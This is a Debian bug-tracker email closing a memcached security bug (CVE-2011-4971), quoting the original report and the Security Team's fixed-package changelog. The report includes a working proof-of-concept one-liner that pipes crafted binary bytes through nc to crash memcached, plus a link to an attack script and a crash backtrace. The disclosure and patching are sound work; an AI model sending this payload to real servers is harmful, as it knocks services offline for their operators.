Your message dated Wed, 01 Jan 2014 21:47:14 +0000
with message-id <[email protected]>
and subject line Bug#706426: fixed in memcached 1.4.13-0.2+deb7u1
has caused the Debian Bug report #706426,
regarding memcached: CVE-2011-4971: remote denial of service
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
706426: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=706426
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: memcached
Version: 1.4.5-1
Severity: important
Tags: security
memcached service crashes when sending specially crafted packet as reported in
here https://code.google.com/p/memcached/issues/detail?id=i192 Mar 15, 2011.
Upstream has not fixed this yet.
PoC:
1) echo -en
'\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
| nc localhost 11211
2) http://insecurety.net/wordpress/wp-content/uploads/2013/04/killthebox.py_.txt
Backtrace from squeeze libmemcached5 0.40-1 memcached 1.4.5-1 below:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff69f0700 (LWP 16957)]
0x00007ffff76c7482 in _wordcopy_bwd_dest_aligned (dstp=140737352400864,
srcp=6501120, len=2305843009213693940)
at wordcopy.c:392
392 wordcopy.c: No such file or directory.
in wordcopy.c
(gdb) bt
#0 0x00007ffff76c7482 in _wordcopy_bwd_dest_aligned (dstp=140737352400864,
srcp=6501120, len=2305843009213693940)
at wordcopy.c:392
#1 0x00007ffff76c568a in *__GI_memmove (dest=0x7ffff7e58053, src=<value
optimized out>, len=18446744073709551581)
at memmove.c:99
#2 0x000000000040a105 in ?? ()
#3 0x00007ffff7bcc344 in event_base_loop () from /usr/lib/libevent-1.4.so.2
#4 0x000000000040d7c4 in ?? ()
#5 0x00007ffff79af8ca in start_thread (arg=<value optimized out>) at
pthread_create.c:300
#6 0x00007ffff7716b6d in clone () at
../sysdeps/unix/sysv/linux/x86_64/clone.S:112
#7 0x0000000000000000 in ?? ()
Please contact me in case you need help solving this issue.
---
Henri Salo
signature.asc
Description: Digital signature
--- End Message ---
--- Begin Message ---
Source: memcached
Source-Version: 1.4.13-0.2+deb7u1
We believe that the bug you reported is fixed in the latest version of
memcached, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Salvatore Bonaccorso <[email protected]> (supplier of updated memcached package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Mon, 30 Dec 2013 17:47:44 +0100
Source: memcached
Binary: memcached
Architecture: source amd64
Version: 1.4.13-0.2+deb7u1
Distribution: wheezy-security
Urgency: high
Maintainer: David MartÃnez Moreno <[email protected]>
Changed-By: Salvatore Bonaccorso <[email protected]>
Description:
memcached - A high-performance memory object caching system
Closes: 706426 733643
Changes:
memcached (1.4.13-0.2+deb7u1) wheezy-security; urgency=high
.
* Non-maintainer upload by the Security Team.
* Add 06_CVE-2011-4971.patch patch.
CVE-2011-4971: Fix remote denial of service. Sending a specially
crafted packet cause memcached to segfault. (Closes: #706426)
* Add 07_CVE-2013-7239.patch patch.
CVE-2013-7239: SASL authentication allows wrong credentials to access
memcache. (Closes: #733643)
Checksums-Sha1:
644a6d5069a743764e43e5fbecd48ef7a67ff478 1806 memcached_1.4.13-0.2+deb7u1.dsc
d9a48d222de53a2603fbab6156d48d0e8936ee92 320751 memcached_1.4.13.orig.tar.gz
08a85a892d0fb0f45e3f35180829582af2c36de3 13967
memcached_1.4.13-0.2+deb7u1.diff.gz
3d13843a773754c684d84e6754f382362b76322d 87758
memcached_1.4.13-0.2+deb7u1_amd64.deb
Checksums-Sha256:
1af5edec8ebf93af2a28a6df484f42e41a3973a90d3689f71cc092ef2d73c1b1 1806
memcached_1.4.13-0.2+deb7u1.dsc
cb0b8b87aa57890d2327906a11f2f1b61b8d870c0885b54c61ca46f954f27e29 320751
memcached_1.4.13.orig.tar.gz
e987f888ba1745cdf6ce604197234cffcaabec338790dabeed1c4a2bc3395e41 13967
memcached_1.4.13-0.2+deb7u1.diff.gz
99a2572e72f8708453ac949c11ee74278dafc7a9ed04a3db3dce583c698b8ad1 87758
memcached_1.4.13-0.2+deb7u1_amd64.deb
Files:
11e442648b3ca4d3b7108e9e26677288 1806 web optional
memcached_1.4.13-0.2+deb7u1.dsc
6d18c6d25da945442fcc1187b3b63b7f 320751 web optional
memcached_1.4.13.orig.tar.gz
177d6c2ea9e0dc555c0b18d49b4f3b6d 13967 web optional
memcached_1.4.13-0.2+deb7u1.diff.gz
ec7acfae73fa674b473b37ed45f9a8b1 87758 web optional
memcached_1.4.13-0.2+deb7u1_amd64.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (GNU/Linux)
iQIcBAEBCgAGBQJSwgiZAAoJEAVMuPMTQ89EB6kP/jFw6pADqy/JCWlcc9Uw0C2t
2Slfmwl6KeazFn0xka+gOYda9sq4cpL12ysaystysjVzsrvDYxmRU5WNYj+YydUO
EKZlZIpOTAb4fqU4ktju/ee/5+zMhxFt34pgrrkYGIMOuc+b8X/g/EUYdUfidXx4
afK4966TQDxULbnCEy+6j1jD2PGyn4nv+GEdbc7g3Pj+P/zk5u1/3r4IdS6+XRP9
rLKzSLHxEl6BVEAY2BLC/N8XLBEmjOZaz5CjyjjEsDnRYqlrXycCivfQeuFYdlqk
CS4oLJbjS32W8dL0sQluLd9+P3rT29CPc20gKdK7iEsbzUiXFUhzM1iArfaLSBjc
cLmLhXLhbhci9EC+3jNybIA0c3Yyrd3LdfKF5qSWno2Wwf9IXVSURUl1y7OmwMmX
c8jtcw1qI9Kq7ETHbJP2mcNtlWK0ARSC0WytAHTAl5AmWvJGbwTV1v4cJDeA0DT0
bUrB7vG38kNX94mwLO7zz3X4A08NYUlNq1HgL6GOZoIRXFeWbRCa1GG9GSxxNXkY
NDiqomqyd7Cw1BuQtRoE79ZGm3/oZ9kuOtePKSazV0DhCZYFdUG+G/GJmZ6RgoX4
raKOJbm7yMseOaMLRODHgR5YhpW70MHSna98k3QpZco3nw/8sQeM2lklWC047ZcI
rYgylah/DqrJDiBCm/yt
=4Jji
-----END PGP SIGNATURE-----
--- End Message ---
